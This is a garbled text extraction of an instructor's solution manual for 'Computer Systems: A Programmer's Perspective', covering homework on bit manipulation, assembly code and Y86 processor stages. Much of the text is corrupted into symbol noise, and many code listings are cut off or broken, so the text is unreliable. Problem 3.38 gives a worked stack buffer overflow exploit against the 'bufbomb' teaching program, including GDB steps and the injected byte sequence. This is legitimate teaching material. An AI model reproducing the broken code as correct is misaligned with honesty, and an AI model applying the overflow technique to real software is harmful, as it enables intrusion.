1、Computer Systems: A Programmers PerspectiveInstructors Solution Manual 1Randal E. BryantDavid R. OHallaronDecember 4, 20031Copyright ca0 2003, R. E. Bryant, D. R. OHallaron. All rights reserved.2Chapter 1Solutions to Homework ProblemsThe text uses two different kinds of exercises:a0 Practice Problem
2、s. These are problems that are incorporated directly into the text, with explanatorysolutions at the end of each chapter. Our intention is that students will work on these problems as theyread the book. Each one highlights some particular concept.a0 Homework Problems. These are found at the end of e
3、ach chapter. They vary in complexity fromsimple drills to multi-week labs and are designed for instructors to give as assignments or to use asrecitation examples.This document gives the solutions to the homework problems.1.1 Chapter 1: A Tour of Computer Systems1.2 Chapter 2: Representing and Manipu
4、lating InformationProblem 2.40 Solution:This exercise should be a straightforward variation on the existing code.code/data/show-ans.c1 void show_short(short int x)2 3 show_bytes(byte_pointer) 4 56 void show_long(long int x)7 8 show_bytes(byte_pointer) 9 12 CHAPTER 1. SOLUTIONS TO HOMEWORK PROBLEMS10
5、11 void show_double(double x)12 13 show_bytes(byte_pointer) 14 code/data/show-ans.cProblem 2.41 Solution:There are many ways to solve this problem. The basic idea is to create some multibyte datum with differentvalues for the most and least-significant bytes. We then read byte 0 and determine which
6、byte it is.In the following solution is to create an int with value 1. We then access its first byte and convert it to anint. This byte will equal 0 on a big-endian machine and 1 on a little-endian machine.code/data/show-ans.c1 int is_little_endian(void)2 3 /* MSB = 0, LSB = 1 */4 int x = 1;56 /* Re
7、turn MSB when big-endian, LSB when little-endian */7 return (int) (* (char *) 8 code/data/show-ans.cProblem 2.42 Solution:This is a simple exercise in masking and bit manipulation. It is important to mention that 0xFF is a wayto generate a mask that selects all but the least significant byte that wo
8、rks for any word size.(x /* All 1s */45 return (x 1) = x;6 code/data/shift-ans.cThe above code peforms a right shift of a word in which all bits are set to 1. If the shift is arithmetic, theresulting word will still have all bits set to 1.Problem 2.45 Solution:This problem illustrates some of the ch
9、allenges of writing portable code. The fact that 1 24;5 code/data/xbyte.cProblem 2.47 Solution:a0a1 a0a1 a2a4a3a6a5a8a7a10a9a0a1a12a11a13a14a11a9a11a14a11a16a15 a11a7 a13a11a14a17a14a11a14a15 a10a12a11a19a18a13a11a14a17a14a11a9a11a16a15 a10a12a11a7a13a14a11a9a11a9a11a9a11a16a15 a11a21a20a13a11a14a17
10、a14a17a14a17a14a15 a10a12a11a21a22a13a11a14a17a14a17a14a11a16a15 a10a12a11a21a20a13a11a9a11a14a17a14a17a14a15 a10a24a23a13a14a17a14a11a9a11a9a11a16a15 a25a13a14a11a14a17a14a17a14a15 a23a13a11a9a11a9a11a9a11a9a11a16a15 a10 a11a13a14a17a14a17a14a17a14a17a14a15a14 a13a14a17a14a17a14a17a14a11a16a15 a11a
11、13a11a14a17a14a17a14a17a14a15 a10a12a11a21a22a13a14a11a9a11a9a11a9a11a16a15 a11a21a20a13a11a14a17a14a17a14a17a14a15 a10a12a11a21a22Problem 2.48 Solution:This problem lets students rework the proof that complement plus increment performs negation.We make use of the property that twos complement addit
12、ion is associative, commutative, and has additiveinverses. Using C notation, if we define y to be x-1, then we have y+1 equal to -y, and hence y equals-y+1. Substituting gives the expression -(x-1)+1, which equals -x.Problem 2.49 Solution:This problem requires a fairly deep understanding of twos com
13、plement arithmetic. Some machines onlyprovide one form of multiplication, and hence the trick shown in the code here is actually required to performthat actual form.As seen in Equation 2.16 we have a1a12a26a10a27a29a28a30a26a32a31a33a1a34a27a29a28a36a35a33a9a4a1a38a37a40a39a42a41a43a28a44a35a45a28a1
14、7a37a46a39a42a41a43a1a12a11 a8a37a35a45a1a38a37a40a39a42a41a47a28a17a37a46a39a42a41a8a49a48a37. The final termhas no effect on the a8a51a50 -bit representation of a1 a26 a27a51a28 a26 , but the middle term represents a correction factor thatmust be added to the high order a50 bits. This is implement
15、ed as follows:code/data/uhp-ans.c1 unsigned unsigned_high_prod(unsigned x, unsigned y)2 3 unsigned p = (unsigned) signed_high_prod(int) x, (int) y);45 if (int) x k;5 /* Make mask of low order 32-k bits */6 unsigned mask = k ? (1 k;5 /* Make mask of high order k bits */6 unsigned mask = k ? (1 -y). N
16、o, Let x = a0a2a1 a2a4a3a2a3 a48a5a4a7a6 a31 a14 .B. (x+y) 1) 31;6 unsigned sy = uy 31;78 return9 (ux= 0, y = uy) | /* x = 0, y = 0 */12 (sx int t4 = t3 t2;return t4;Problem 3.32 Solution:This code example demonstrates one of the pedagogical challenges of using a compiler to generate assemblycode ex
17、amples. Seemingly insignificant changes in the C code can yield very different results. Of course,students will have to contend with this property as work with machine-generated assembly code anyhow.They will need to be able to decipher many different code patterns. This problem encourages them to t
18、hinkin abstract terms about one such pattern.The following is an annotated version of the assembly code:1 movl 8(%ebp),%edx x2 movl 12(%ebp),%ecx y3 movl %edx,%eax4 subl %ecx,%eax result = x - y5 cmpl %ecx,%edx Compare x:y6 jge .L3 if = goto done:7 movl %ecx,%eax8 subl %edx,%eax result = y - x9 .L3:
19、 done:A. When a1a1a0 a28 , it will compute first a1 a10 a28 and then a28 a10 a1 . When a1a1a2 a28 it just computes a1 a10 a28 .B. The code for then-statement gets executed unconditionally. It then jumps over the code for else-statement if the test is false.C.then-statementt = test-expr;if(t)goto don
20、e;else-statementdone:D. The code in then-statement must not have any side effects, other than to set variables that are also setin else-statement.1.3. CHAPTER 3: MACHINE LEVEL REPRESENTATION OF C PROGRAMS 11Problem 3.33 Solution:This problem requires students to reason about the code fragments that
21、implement the different branches ofa switch statement. For this code, it also requires understanding different forms of pointer dereferencing.A. In line 29, register %edx is copied to register %eax as the return value. From this, we can infer that%edx holds result.B. The original C code for the func
22、tion is as follows:1 /* Enumerated type creates set of constants numbered 0 and upward */2 typedef enum MODE_A, MODE_B, MODE_C, MODE_D, MODE_E mode_t;34 int switch3(int *p1, int *p2, mode_t action)5 6 int result = 0;7 switch(action) 8 case MODE_A:9 result = *p1;10 *p1 = *p2;11 break;12 case MODE_B:1
23、3 *p2 += *p1;14 result = *p2;15 break;16 case MODE_C:17 *p2 = 15;18 result = *p1;19 break;20 case MODE_D:21 *p2 = *p1;22 /* Fall Through */23 case MODE_E:24 result = 17;25 break;26 default:27 result = -1;28 29 return result;30 Problem 3.34 Solution:This problem gives students practice analyzing disa
24、ssembled code. The switch statement contains all thefeatures one can imaginecases with multiple labels, holes in the range of possible case values, and casesthat fall through.code/asm/switchbody-ans.c12 CHAPTER 1. SOLUTIONS TO HOMEWORK PROBLEMS1 int switch_prob(int x)2 3 int result = x;45 switch(x)
25、6 case 50:7 case 52:8 result = 2;12 break;13 case 54:14 result *= 3;15 /* Fall through */16 case 55:17 result *= result;18 /* Fall through */19 default:20 result += 10;21 2223 return result;24 code/asm/switchbody-ans.cProblem 3.35 Solution:This example illustrates a case where the compiler was cleve
26、r, but humans can be more clever. Such cases are notunusual, and it is important for students to realize that compilers do not always generate optimal code.In the following, we have merged variables B and nTjPk into a single pointer Bptr. This pointer gets incrementedby n (which the compiler scales
27、by 4) on every iteration.code/asm/varprod-ans.c1 int var_prod_ele_opt (var_matrix A, var_matrix B, int i, int k, int n)2 3 int *Aptr = 4 int *Bptr = 5 int result = 0;6 int cnt = n;78 if (n right using a displacement of 184 (0xb8). That meansarray a spans from bytes 4 to 184 of b_struct, implying tha
28、t CNT is a9 a11a21a23a51a18a12a10 a18 a11 a3 a8 a14 a31a2a1 .3. Line 9 appears to dereference ap. Actually, it is computing ap-idx, since field idx is at thebeginning of structure a_struct.4. Line 10 scales ap-idx by 4, and line 13 stores n at an address computed by adding this scaledvalue, ap, and
29、4. From this we conclude that field x denotes an array of integers that follow rightafter field idx.This analysis leads us to the following answers:A. CNT is 9.B. code/asm/structprob-ans.c1 typedef struct 2 int idx;3 int x4;4 a_struct;code/asm/structprob-ans.cProblem 3.37 Solution:This problem gets
30、students in the habit of writing reliable code. As a general principle, code should not bevulnerable to conditions over which it has no control, such as the length of an input line. The followingimplementation uses the library function fgets to read up to BUFSIZEcharacters at a time.14 CHAPTER 1. SO
31、LUTIONS TO HOMEWORK PROBLEMS1 /* Read input line and write it back */2 /* Code will work for any buffer size. Bigger is more time-efficient */3 #define BUFSIZE 644 void good_echo()5 6 char bufBUFSIZE;7 int i;8 while (1) 9 if (!fgets(buf, BUFSIZE, stdin)10 return; /* End of file or error */11 /* Prin
32、t characters in buffer */12 for (i = 0; bufi i+)13 if (putchar(bufi) = EOF)14 return; /* Error */15 if (bufi = n) 16 /* Reached terminating newline */17 putchar(n);18 return;19 20 21 An alternative implementation is to use getcharto read the characters one at a time.Problem 3.38 Solution:Successfull
33、y mounting a buffer overflow attack requires understanding many aspects of machine-level pro-grams. It is quite intriguing that by supplying a string to one function, we can alter the behavior of anotherfunction that should always return a fixed value. In assigning this problem, you should also give
34、 students astern lecture about ethical computing practices and dispell any notion that hacking into systems is a desirableor even acceptable thing to do.Our solution starts by disassembling bufbomb, giving the following code for getbuf:1 080484f4 :2 80484f4: 55 push %ebp3 80484f5: 89 e5 mov %esp,%eb
35、p4 80484f7: 83 ec 18 sub $0x18,%esp5 80484fa: 83 c4 f4 add $0xfffffff4,%esp6 80484fd: 8d 45 f4 lea 0xfffffff4(%ebp),%eax7 8048500: 50 push %eax8 8048501: e8 6a ff ff ff call 8048470 9 8048506: b8 01 00 00 00 mov $0x1,%eax10 804850b: 89 ec mov %ebp,%esp11 804850d: 5d pop %ebp12 804850e: c3 ret13 8048
36、50f: 90 nopWe can see on line 6 that the address of buf is 12 bytes below the saved value of %ebp, which is 4 bytesbelow the return address. Our strategy then is to push a string that contains 12 bytes of code, the saved value1.3. CHAPTER 3: MACHINE LEVEL REPRESENTATION OF C PROGRAMS 15of %ebp, and
37、the address of the start of the buffer. To determine the relevant values, we run GDB as follows:1. First, we set a breakpoint in getbuf and run the program to that point:(gdb) break getbuf(gdb) runComparing the stopping point to the disassembly, we see that it has already set up the stack frame.2. W
38、e get the value of buf by computing a value relative to %ebp:(gdb) print /x (%ebp + 12)This gives 0xbfffefbc.3. We find the saved value of register %ebp by dereferencing the current value of this register:(gdb) print /x *$ebpThis gives 0xbfffefe8.4. We find the value of the return pointer on the sta
39、ck, at offset 4 relative to %ebp:(gdb) print /x *(int *)$ebp+1)This gives 0x8048528We can now put this information together to generate assembly code for our attack:1 pushl $ 0x8048528 Put correct return pointer back on stack2 movl $0xdeadbeef,%eax Alter return value3 ret Re-execute return4 .align 4
40、 Round up to 125 .long 0xbfffefe8 Saved value of %ebp6 .long 0xbfffefbc Location of buf7 .long 0x00000000 PaddingNote that we have used the .align statement to get the assembler to insert enough extra bytes to use uptwelve bytes for the code. We added an extra 4 bytes of 0s at the end, because in so
41、me cases OBJDUMPwould not generate the complete byte pattern for the data. These extra bytes (plus the termininating nullbyte) will overflow into the stack frame for test, but they will not affect the program behavior.Assembling this code and disassembling the object code gives us the following:1 0:
42、 68 28 85 04 08 push $0x80485282 5: b8 ef be ad de mov $0xdeadbeef,%eax3 a: c3 ret4 b: 90 nop Byte inserted for alignment.5 c: e8 ef ff bf bc call 0xbcc00000 Invalid disassembly.6 11: ef out %eax,(%dx) Trying to diassemble7 12: ff (bad) data8 13: bf 00 00 00 00 mov $0x0,%edi16 CHAPTER 1. SOLUTIONS T
43、O HOMEWORK PROBLEMSFrom this we can read off the byte sequence:68 28 85 04 08 b8 ef be ad de c3 90 e8 ef ff bf bc ef ff bf 00 00 00 00Problem 3.39 Solution:This problem is a variant on the asm examples in the text. The code is actually fairly simple. It relies onthe fact that asm outputs can be arbi
44、trary lvalues, and hence we can use dest0 and dest1 directlyin the output list.code/asm/asmprobs-ans.c1 void full_umul(unsigned x, unsigned y, unsigned dest)2 3 asm(“movl %2,%eax; mull %3; movl %eax,%0; movl %edx,%1“4 : “=r“ (dest0), “=r“ (dest1) /* Outputs */5 : “r“ (x), “r“ (y) /* Inputs */6 : “%e
45、ax“, “%edx“ /* Clobbers */7 );8 code/asm/asmprobs-ans.cProblem 3.40 Solution:For this example, students essentially have to write the entire function in assembly. There is no (apparent)way to interface between the floating point registers and the C code using extended asm.code/asm/fscale.c1 /* Compu
46、te x * 2n. Relies on known stack positions for arguments */2 void scale(double x, int n, double *dest)3 4 /* Insert the following assembly code sequence:5 fildl 16(%ebp) # Convert n to floating point and push6 fldl 8(%ebp) # Push x7 fscale # Compute x * 2n8 movl 20(%ebp) # Get dest9 fstpl (%eax) # S
47、tore result at *dest10 */11 asm(“fildl 16(%ebp); fldl 8(%ebp); fscale; movl 20(%ebp),%eax;12 fstpl (%eax); fstp %st(0)“13 : “%eax“);1415 code/asm/fscale.c1.4. CHAPTER 4: PROCESSOR ARCHITECTURE 171.4 Chapter 4: Processor ArchitectureProblem 4.32 Solution:This problem makes students carefully examine
48、the tables showing the computation stages for the differentinstructions. The steps for iaddl are a hybrid of those for irmovl and OPl.Stage iaddl V, rBFetch icode:ifun a0 Ma1 a2PCa3rA:rB a0 Ma1 a2PC a4a6a5a7a3valC a0 Ma8 a2PC a4a10a9a11a3valP a0 PC a4a13a12DecodevalB a0 Ra2rBa3Execute valE a0 valB a
49、4 valCMemoryWrite back Ra2rBa3a14a0 valEPC update PC a0 valPProblem 4.33 Solution:The leave instruction is fairly obscure, but working through its implementation makes it easier to under-tand the implementation of the popl instruction, one of the trickiest of the Y86 instructions.Stage leaveFetch icode:ifun a0 Ma1 a2PCa3valP a0 PC a4a6a5Decode valA a0 Ra2a16a15a18a17a20a19a22a21 a3valB a0 Ra2a16a15a23a17a20a19a24a21 a3Execute valE a0 valB a4a26a25Memory valM a0 Ma8 a2valAa3Write back Ra2a1
